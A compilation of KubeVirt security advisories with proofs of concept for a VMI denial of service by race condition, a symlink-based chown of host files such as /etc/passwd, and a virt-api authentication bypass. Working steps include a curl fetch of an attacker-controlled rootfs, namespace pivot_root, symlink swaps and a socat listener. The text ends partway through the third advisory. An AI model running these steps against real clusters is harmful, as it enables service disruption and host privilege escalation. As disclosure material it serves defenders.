operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13

To effectively attach the fake pod to the VMI, the attacker should
wait for a state update to trigger the reconciliation loop:

# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched
# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID

To illustrate the impact of this vulnerability, a race condition will
be triggered in the sync function of the VMI controller:

// pkg/virt-controller/watch/vmi.go

func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
  //...
  if !isTempPod(pod) && controller.IsPodReady(pod) {

		// mark the pod with annotation to be evicted by this controller
		newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
		maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
    // here a new updated pod is returned
		patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
		if err != nil {
			return common.NewSyncError(err, controller.FailedPodPatchReason), pod
		}
		pod = patchedPod
    // ...

func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
	patchSet := patch.New()
	for key, newValue := range newAnnotations {
		if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
			patchSet.AddOption(
				patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
			)
		}
	}
	if patchSet.IsEmpty() {
		return pod, nil
	}
	
	patchBytes, err := patchSet.GeneratePayload()
	// ...
	patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
  // ...
	return patchedPod, nil
}

The above code adds additional annotations to the virt-launcher pod
related to node eviction. This happens via an API call to Kubernetes
which upon success returns a new updated pod object. This object
replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race
condition which will mark the VMI as failed:

// pkg/virt-controller/watch/vmi.go

func isTempPod(pod *k8sv1.Pod) bool {
  // EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
	_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
	return ok
}

// pkg/virt-controller/watch/vmi.go

func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
  // ...
  vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
	tempPodExists := controller.PodExists(pod) && isTempPod(pod)

  //...
  case vmi.IsRunning():
		if !vmiPodExists {
      // MK: this will toggle the VMI phase to Failed
			vmiCopy.Status.Phase = virtv1.Failed
			break
		}
    //...

  vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
	if vmiChanged {
    // MK: this will detect that the phase of the VMI has changed and update the resource
		key := controller.VirtualMachineInstanceKey(vmi)
		c.vmiExpectations.SetExpectations(key, 1, 0)
		_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
		if err != nil {
			c.vmiExpectations.LowerExpectations(key, 1, 0)
			return err
		}
	}

To trigger it, the attacker should update the fake-launcher pod's
annotations after the check if !isTempPod(pod) && controller.IsPodReady(pod)
in sync but before the patch API call in syncPodAnnotations, so that
the patched pod object returned by the API already carries the new
annotation when the check
vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
in updateStatus is evaluated. The annotation to add is as follows:

annotations:
    kubevirt.io/ephemeral-provisioning: "true"

The above annotation will mark the attacker pod as ephemeral (i.e.,
used to provision the VMI) and will fail the VMI as the latter is
already running (provisioning happens before the VMI starts running).

The update should also happen during the reconciliation loop in which
the fake-launcher pod is initially associated with the VMI and its
eviction-related annotations are updated.
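
To make the timing clearer, the following standalone Go toy model
(not KubeVirt code; the types, names and delays are purely
illustrative) reproduces the check/patch/re-check pattern and shows
how a write landing inside the window flips the second isTempPod
evaluation:

package main

import (
	"fmt"
	"sync"
	"time"
)

const ephemeralAnnotation = "kubevirt.io/ephemeral-provisioning"

// fakePod is a toy stand-in for the pod object seen by the controller.
type fakePod struct {
	mu          sync.Mutex
	annotations map[string]string
}

func (p *fakePod) isTemp() bool {
	p.mu.Lock()
	defer p.mu.Unlock()
	_, ok := p.annotations[ephemeralAnnotation]
	return ok
}

func (p *fakePod) setAnnotation(k, v string) {
	p.mu.Lock()
	defer p.mu.Unlock()
	p.annotations[k] = v
}

func main() {
	pod := &fakePod{annotations: map[string]string{}}

	// Attacker: waits for the window between the two checks, then adds
	// the ephemeral-provisioning annotation to the fake launcher pod.
	go func() {
		time.Sleep(10 * time.Millisecond)
		pod.setAnnotation(ephemeralAnnotation, "true")
	}()

	// Controller, step 1 (sync): the pod is not temp and looks ready.
	fmt.Println("sync: isTempPod =", pod.isTemp()) // false

	// ... window in which syncPodAnnotations patches the pod and the
	// attacker's write lands ...
	time.Sleep(50 * time.Millisecond)

	// Controller, step 2 (updateStatus): the refreshed pod is now temp,
	// so vmiPodExists becomes false and the running VMI is marked Failed.
	fmt.Println("updateStatus: isTempPod =", pod.isTemp()) // true
}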

Upon successful exploitation, the VMI is marked as Failed and can no
longer be controlled via the Kubernetes API. However, the QEMU process
is still running and the VMI is still present in the cluster:

operator@minikube:~$ kubectl get vmi
NAME                       AGE    PHASE    IP            NODENAME   READY
launcher-label-confusion   128m   Failed   10.244.0.10   minikube   False
# The VMI is not reachable anymore 
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status

# The two pods are still associated with the VMI

operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}' 
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}

Impact

As a result, an attacker could provoke a DoS condition for the
affected VMI, compromising the availability of the services it
provides.

Severity
Moderate
5.3/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
High
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-64435

Weaknesses
Weakness CWE-703


Credits

    @mihailkirov (Finder)
    @Faeris95 (Finder)


_____________________________________________________________________


Isolation Detection Flaw Allows Arbitrary File Permission Changes
Moderate
stu-gott published GHSA-2r4r-5x78-mvqf Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

It is possible to trick the virt-handler component into changing the
ownership of arbitrary files on the host node to the unprivileged
user with UID 107 due to mishandling of symlinks when determining
the root mount of a virt-launcher pod.


Details

In the current implementation, the virt-handler does not verify
whether the launcher-sock is a symlink or a regular file. This
oversight can be exploited, for example, to change the ownership
of arbitrary files on the host node to the unprivileged user with
UID 107 (the same user used by virt-launcher), thus compromising
the CIA (Confidentiality, Integrity and Availability) of data on
the host.
To successfully exploit this vulnerability, an attacker should be
in control of the file system of the virt-launcher pod.
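
A minimal standalone Go sketch of the missing check (assumed helper
name, not virt-handler code): the launcher-sock path is inspected
with Lstat, which does not follow symlinks, and is rejected if it is
anything other than a regular unix socket:

package main

import (
	"fmt"
	"os"
)

// assertLauncherSock is a hypothetical guard: a launcher-sock that has
// been replaced with a symlink (e.g. pointing into /proc/<pid>/root of
// an attacker-controlled process) is detected and rejected before it is
// used for isolation detection.
func assertLauncherSock(sockPath string) error {
	info, err := os.Lstat(sockPath)
	if err != nil {
		return err
	}
	if info.Mode()&os.ModeSymlink != 0 {
		return fmt.Errorf("%s is a symlink, refusing to use it", sockPath)
	}
	if info.Mode()&os.ModeSocket == 0 {
		return fmt.Errorf("%s is not a unix socket", sockPath)
	}
	return nil
}

func main() {
	if err := assertLauncherSock("/var/run/kubevirt/sockets/launcher-sock"); err != nil {
		fmt.Println("error:", err)
	}
}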


PoC

In this demonstration, two additional vulnerabilities are combined
with the primary issue to arbitrarily change the ownership of a file
located on the host node:

    - A symbolic link (launcher-sock) is used to manipulate the
      interpretation of the root mount within the affected container,
      effectively bypassing expected isolation boundaries.
    - Another symbolic link (disk.img) is employed to alter the
      perceived location of data within a PVC, redirecting it to a
      file owned by root on the host filesystem.
    - As a result, the ownership of an existing host file owned by
      root is changed to a less privileged user with UID 107.

It is assumed that an attacker has access to a virt-launcher pod's
file system (for example, obtained using another vulnerability) and
also has access to the host file system with the privileges of the
qemu user (UID=107). It is also assumed that they can create
unprivileged user namespaces:

admin@minikube:~$ sysctl -w kernel.unprivileged_userns_clone=1

The steps below are inspired by an article in which the attacker
constructs an isolated environment solely using Linux namespaces and
an augmented Alpine container root file system.

# Download a container file system from an attacker-controlled location
qemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar
# Create a directory and extract the file system in it
qemu-compromised@minikube:~$  mkdir rootfs_alpine && tar -xf augmented-alpine.tar -C rootfs_alpine
# Create a MOUNT and remapped USER namespace environment and execute a shell process in it
qemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh
# Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.
# The user is root in its new USER namespace
root@minikube:~$ mount --bind rootfs_alpine rootfs_alpine && cd rootfs_alpine && mkdir hostfs_root
# Swap the current root of the process and store the old one within a directory
root@minikube:~$ pivot_root . hostfs_root 
root@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin
# Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount
root@minikube:~$ PVC_PATH="/var/run/kubevirt-private/vmi-disks/corrupted-pvc" && \
mkdir -p "${PVC_PATH}" && \
cd "${PVC_PATH}"
# Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory
root@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img
# Create the socket which will confuse the isolation detector and start listening on it
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -

After the environment is set, the launcher-sock in the virt-launcher
container should be replaced with a symlink to
../../../../../../../../../proc/2245509/root/tmp/bad.sock (2245509
is the PID of the above isolated shell process). This should be done,
however, at the right moment. For this demonstration, it was decided
to trigger the bug by leveraging a race condition when creating or
updating a VMI:

//pkg/virt-handler/vm.go

func (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {
  // ...
  //!!! MK: the change should happen here before executing the below line !!!
  isolationRes, err := c.podIsolationDetector.Detect(vmi)
		if err != nil {
			return fmt.Errorf(failedDetectIsolationFmt, err)
		}
		virtLauncherRootMount, err := isolationRes.MountRoot()
		if err != nil {
			return err
		}
		// ...

		// initialize disks images for empty PVC
		hostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)
		// MK: here the permissions are changed
		err = hostDiskCreator.Create(vmi)
		if err != nil {
			return fmt.Errorf("preparing host-disks failed: %v", err)
		}
    // ...

The manifest of the VMI which is going to trigger the bug is:

# The PVC will be used for the `disk.img` related bug
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: corrupted-pvc
spec:
  accessModes:
    - ReadWriteMany
  resources:
    requests:
      storage: 500Mi
---
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  labels:
  name: launcher-symlink-confusion
spec:
  domain:
    devices:
      disks:
      - name: containerdisk
        disk:
          bus: virtio
      - name: corrupted-pvc
        disk:
          bus: virtio
      - name: cloudinitdisk
        disk:
          bus: virtio
    resources:
      requests:
        memory: 1024M
  terminationGracePeriodSeconds: 0
  volumes:
  - name: containerdisk
    containerDisk:
      image: quay.io/kubevirt/cirros-container-disk-demo
  - name: corrupted-pvc
    persistentVolumeClaim:
      claimName: corrupted-pvc
  - name: cloudinitdisk      
    cloudInitNoCloud:
      userDataBase64: SGkuXG4=

Just before the isolation-detection line marked above is executed,
the attacker should replace the launcher-sock with a symlink to the
bad.sock socket controlled by the isolated process:

# the namespaced process controlled by the attacker has pid=2245509
qemu-compromised@minikube:~$ p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}') &&  ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

Upon successful exploitation, virt-handler connects to the
attacker-controlled socket, misinterprets the root mount and changes
the ownership of the host's /etc/passwd file:

# `virt-handler` connects successfully
root@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
...
2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 "<anon>" on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010
2025/05/27 17:17:35 socat[2245509] N listening on AF=1 "/tmp/bad.sock"
2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio
2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]
PRI * HTTP/2.0

admin@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd

admin@minikube:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
compromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash


The attacker, controlling the unprivileged qemu user, can now update
the contents of the file.


Impact

This oversight can be exploited, for example, to change the
ownership of arbitrary files on the host node to the
unprivileged user with UID 107 (the same user used by
virt-launcher) thus, compromising the CIA (Confidentiality,
Integrity and Availability) of data on the host.


Severity
Moderate
5.0/ 10

CVSS v3 base metrics
Attack vector
Local
Attack complexity
High
Privileges required
High
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

CVE ID
CVE-2025-64437

Weaknesses
Weakness CWE-59

Credits

    @mihailkirov (Finder)
    @Faeris95 (Finder)

_____________________________________________________________________


Authentication Bypass in Kubernetes Aggregation Layer
Moderate
stu-gott published GHSA-38jw-g2qx-4286 Nov 6, 2025

Package
No package listed

Affected versions
1.5.0

Patched versions
None


Description

Summary

A flawed implementation of the Kubernetes aggregation layer's
authentication flow could enable bypassing RBAC controls.


Details

It was discovered that the virt-api component fails to correctly
authenticate the client when receiving API requests over mTLS. In
particular, it fails to validate the CN (Common Name) field in the
received client TLS certificates against the set of allowed values
defined in the extension-apiserver-authentication configmap.

The Kubernetes API server proxies received client requests through a
component called aggregator (part of K8S's API server), and
authenticates to the virt-api server using a certificate signed by
the CA specified via the --requestheader-client-ca-file CLI flag.
This CA bundle is primarily used in the context of aggregated API
servers, where the Kubernetes API server acts as a trusted front-end
proxy forwarding requests.

While this is the most common use case, the same CA bundle can also
support less common scenarios, such as issuing certificates to
authenticating front-end proxies. These proxies can be deployed by
organizations to extend Kubernetes' native authentication mechanisms
or to integrate with existing identity systems
(e.g., LDAP, OAuth2, SSO platforms). In such cases, the Kubernetes
API server can trust these external proxies as legitimate
authenticators, provided their client certificates are signed by
the same CA as the one defined via --requestheader-client-ca-file.
Nevertheless, these external authentication proxies are not supposed
to directly communicate with aggregated API servers.

Thus, by failing to validate the CN field in the client TLS
certificate, the virt-api component may allow an attacker to bypass
existing RBAC controls by directly communicating with the aggregated
API server, impersonating the Kubernetes API server and its
aggregator component.
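
For illustration, the following standalone Go sketch (assumed names
and wiring, not the virt-api implementation) shows the missing step:
after the mTLS handshake, the client certificate's CommonName is
compared against the allowed names published in the
extension-apiserver-authentication ConfigMap (front-proxy-client in
the default Minikube setup) before request headers such as
X-Remote-User are trusted:

package main

import (
	"crypto/tls"
	"fmt"
	"net/http"
)

// requireAllowedCN is a hypothetical middleware: requests are accepted
// only if the verified client certificate's CommonName is in the
// allowed-names list (the value of requestheader-allowed-names).
func requireAllowedCN(allowed []string, next http.Handler) http.Handler {
	allowedSet := make(map[string]struct{}, len(allowed))
	for _, name := range allowed {
		allowedSet[name] = struct{}{}
	}
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.TLS == nil || len(r.TLS.VerifiedChains) == 0 {
			http.Error(w, "client certificate required", http.StatusUnauthorized)
			return
		}
		cn := r.TLS.VerifiedChains[0][0].Subject.CommonName
		if _, ok := allowedSet[cn]; !ok {
			http.Error(w, "client certificate CN is not an allowed front proxy", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/apis/subresources.kubevirt.io/v1/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "authenticated aggregated API request")
	})
	server := &http.Server{
		Addr:    ":8443",
		Handler: requireAllowedCN([]string{"front-proxy-client"}, mux),
		TLSConfig: &tls.Config{
			// ClientCAs would be loaded from the requestheader-client-ca-file bundle.
			ClientAuth: tls.RequireAndVerifyClientCert,
		},
	}
	_ = server.ListenAndServeTLS("server.crt", "server.key")
}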

However, two key prerequisites must be met for successful
exploitation:

    - The attacker must possess a valid front-end proxy certificate
      signed by the trusted CA (requestheader-client-ca-file). For
      example, they can steal the certificate material by compromising
      a front-end proxy, or they could obtain a bundle by exploiting a
      poorly configured and managed PKI system.

    - The attacker must have network access to the virt-api service,
      such as via a compromised or controlled pod within the cluster.

These conditions significantly reduce the likelihood of exploitation.
In addition, the virt-api component acts as a sub-resource server,
meaning it only handles requests for specific resources and
sub-resources. The requests it handles are mostly related to the
lifecycle of already existing resources.

Nonetheless, if these conditions are met, the vulnerability could be
exploited by a Pod-Level Attacker to escalate privileges and
manipulate existing virtual machine workloads, potentially leading to
a violation of their CIA (Confidentiality, Integrity and Availability).


PoC


Bypassing authentication

In this section, it is demonstrated how an attacker could use a
certificate with a different CN field to bypass the
authentication of the aggregation layer and perform arbitrary
API sub-resource requests to the virt-api server.

The kube-apiserver has been launched with the following CLI flags:

admin@minikube:~$ kubectl -n kube-system describe pod kube-apiserver-minikube | grep Command -A 28
    Command:
      kube-apiserver
      --advertise-address=192.168.49.2
      --allow-privileged=true
      --authorization-mode=Node,RBAC
      --client-ca-file=/var/lib/minikube/certs/ca.crt
      --enable-admission-plugins=NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
      --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
      --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
      --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
      --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=8443
      --service-account-issuer=https://kubernetes.default.svc.cluster.local
      --service-account-key-file=/var/lib/minikube/certs/sa.pub
      --service-account-signing-key-file=/var/lib/minikube/certs/sa.key
      --service-cluster-ip-range=10.96.0.0/12
      --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
      --tls-private-key-file=/var/lib/minikube/certs/apiserver.key

By default, Minikube generates a self-signed CA certificate (/var/lib/minikube/certs/front-proxy-ca.crt) and uses it to sign the certificate used by the aggregator (/var/lib/minikube/certs/front-proxy-client.crt):

# inspect the self-signed front-proxy-ca certificate
admin@minikube:~$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-ca.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-ca
# inspect the front-proxy-client certificate signed with the above cert
$ openssl x509 -text -in  /var/lib/minikube/certs/front-proxy-client.crt | grep -e "Issuer:" -e "Subject:"
        Issuer: CN = front-proxy-ca
        Subject: CN = front-proxy-client

One can also inspect the contents of the
extension-apiserver-authentication ConfigMap which is used as a
trust anchor by all extension API servers:

admin@minikube:~$ kubectl -n kube-system describe configmap extension-apiserver-authentication


Name:         extension-apiserver-authentication
Namespace:    kube-system
Labels:       <none>
Annotations:  <none>

Data
====
requestheader-client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDETCCAfmgAwIBAgIIN59KhbrmeJkwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UE
AxMOZnJvbnQtcHJveHktY2EwHhcNMjUwNTE4MTQzMTI3WhcNMzUwNTE2MTQzNjI3
WjAZMRcwFQYDVQQDEw5mcm9udC1wcm94eS1jYTCCASIwDQYJKoZIhvcNAQEBBQAD
ggEPADCCAQoCggEBALOFlqbM1h3uhTdU9XBZQ6AX8S7M0nT5SgSOSItJrVwjNUv/
t4FAQxnGPW7fhp9A9CeQ92DGLXkm88fgHCgnPJuodKgX8fS7NHfswvXKkgo6C4UO
2AmW0NAkuKMyTmf1tWugot7hj3sGFfIzVSLL73wm1Ci8unTaGKZG01ZZalL1kzz9
ObpmEn7DQvSJd7m5gALP4KPJdkFjoagMI4UlIownARl0h2DX5WAKy0ynGfEBvw+P
hEbuVPb+egeUVTn9/4JIqdUw21tUQrmbQqPib8BByueiOYqEerGxZDpLAxh230VG
Q6omoyUHjE6SIMBoUnAqAdLbTElVbLWJawlLZzECAwEAAaNdMFswDgYDVR0PAQH/
BAQDAgKkMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFPjiIeJVR7zQBCkpmkEa
I+70PxA8MBkGA1UdEQQSMBCCDmZyb250LXByb3h5LWNhMA0GCSqGSIb3DQEBCwUA
A4IBAQBiNTe9Sdv9RnKqTyt+Xj0NJrScVOiWPb9noO5XSyBtOy8F8b+ZWAtzc+eI
G/g6hpiT7lq3hVtmDNiE6nsP3tywXf0mgg7blRC0l3DxGtSzJZlbahAI4/U5yen7
orKiWiD/ObK2rGbt1toVRyvJzPi3hYjh4mA6GMyFbOC6snopNyM9oj+b/EuTCavf
l9WTNn2ZZQ1nYfJsLjOY5k/VtpZw1D/QwYt0u/A83RxEeBvK2aZPsq/nA0jqeHhe
VHauDQslkjMw0yrFc1b+Ju4Ly+BwH+Mi7ALUINc8EVncWZyM2L7B4N9XwPSp6YPX
fZnj69fu0JWfrq88M+LnKOyfkqi4
-----END CERTIFICATE-----


requestheader-extra-headers-prefix:
----
["X-Remote-Extra-"]

requestheader-group-headers:
----
["X-Remote-Group"]

requestheader-username-headers:
----
["X-Remote-User"]

client-ca-file:
----
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTI1MDQxMTE3MzM1N1oXDTM1MDQxMDE3MzM1N1owFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALXK
ShgBkCDLETxDOSknvWHr7lfnvLtSCLf3VPVwFQNDhLAuFBc2H1MSMqzW6hcyxAVA
arQbOe36zxHjHpaP3VlGOEw3CVesPNw6ZToGuhpRq1inQATzeg2yc5w1jtRjLXhb
BWp7zCDk1qoHws/fWpaWOe3oQq4ZOA1+bJDsmZ7LjmMtOKHdqftEFz/RGVrn7nKD
/WXyGgKgSSNFsDK+Ow6gN6r3b10S82VQ5MwncJuqGO1r036yjwWBU8PEpknc/MhG
J/bMdI/w49rxlEAE92OadYRNvC0SDhG0HyPj9BMVx8ZG5X28lZMgq98UzVgu9Try
e8tndHqxUaU7rjO7j/8CAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBS8FpfTfvGkXDPJEXUoTQs+MwVhPjANBgkqhkiG9w0BAQsFAAOCAQEAFg+gxZ7W
zZValzuoXSc3keutB4U0QXFzjOhTVo8D/qsBNkxasdsrYjF2Do/KuGxCefXRZbTe
QWX3OFhiiabd0nkGoNTxXoPqwOJHczk+bo8L2Vcva1JAi/tBVNkPULzZilZWgWQz
8d8NgABP7MpHnOJVvAr6BEaS1wpoLzyEMXm6YToZXjDX1ajzyyLonQ9So1Y7aj6v
yPQ8OO2TUhkEpzb28/s5Pr33QT8W0/FX3m8+MGSNvWdHNZ+UzXLk3iSfySgjmciZ
o4C5yKLZgKFxoFBxY25emr6QDZW+3HicZj6sPsblGlvlBF5wQgF65msgjvmRfTLq
JPwzd6yDCMUuZQ==
-----END CERTIFICATE-----


requestheader-allowed-names:
----
["front-proxy-client"]


BinaryData
====

Events:  <none>

It is assumed that an attacker has obtained access to a Kubernetes
pod and can communicate with the virt-api service reachable at 10.244.0.6.

root@compromised-pod:~$ curl -ks https://10.244.0.6:8443/ | jq .
{
  "paths": [
    "/apis",
    "/openapi/v2",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1",
    "/apis/subresources.kubevirt.io",
    "/apis/subresources.kubevirt.io/v1alpha3"
  ]
}

The virt-api service has two types of endpoints -- authenticated and non-authenticated:

// pkg/authorizer/authorizer.go

var noAuthEndpoints = map[string]struct{}{
	"/":           {},
	"/apis":       {},
	"/healthz":    {},
	"/openapi/v2": {},
	// Although KubeVirt does not publish v3, Kubernetes aggregator controller will
	// handle v2 to v3 (lossy) conversion if KubeVirt returns 404 on this endpoint
	"/openapi/v3": {},
	// The endpoints with just the version are needed for api aggregation discovery
	// Test with e.g. kubectl get --raw /apis/subresources.kubevirt.io/v1
	"/apis/subresources.kubevirt.io/v1":               {},
	"/apis/subresources.kubevirt.io/v1/version":       {},
	"/apis/subresources.kubevirt.io/v1/guestfs":       {},
	"/apis/subresources.kubevirt.io/v1/healthz":       {},
	"/apis/subresources.kubevirt.io/v1alpha3":         {},
	"/apis/subresources.kubevirt.io/v1alpha3/version": {},
	"/apis/subresources.kubevirt.io/v1alpha3/guestfs": {},
	"/apis/subresources.kubevirt.io/v1alpha3/healthz": {},
	// the profiler endpoints are blocked by a feature gate
	// to restrict the usage to development environments
	"/start-profiler": {},
	"/stop-profiler":  {},
	"/dump-profiler":  {},
	"/apis/subresources.kubevirt.io/v1/start-cluster-profiler":       {},
	"/apis/subresources.kubevirt.io/v1/stop-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1/dump-cluster-profiler":        {},
	"/apis/subresources.kubevirt.io/v1alpha3/start-cluster-profiler": {},
	"/apis/subresources.kubevirt.io/v1alpha3/stop-cluster-profiler":  {},
	"/apis/subresources.kubevirt.io/v1alpha3/dump-cluster-profiler":  {},
}

Each endpoint which is not in this list is considered an authenticated
endpoint and requires a valid client certificate to be presented by
the caller.

# trying to reach an API endpoint not in the above list would require client authentication
attacker@compromised-pod:~$ curl -ks https://10.244.0.6:8443/v1
request is not authenticated
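
For illustration only, below is a minimal Go sketch of how such an
allow-list can gate client-certificate authentication in an HTTP
handler. This is a simplified, hypothetical example and not
KubeVirt's actual implementation:

// Hypothetical sketch: every path outside the allow-list requires a
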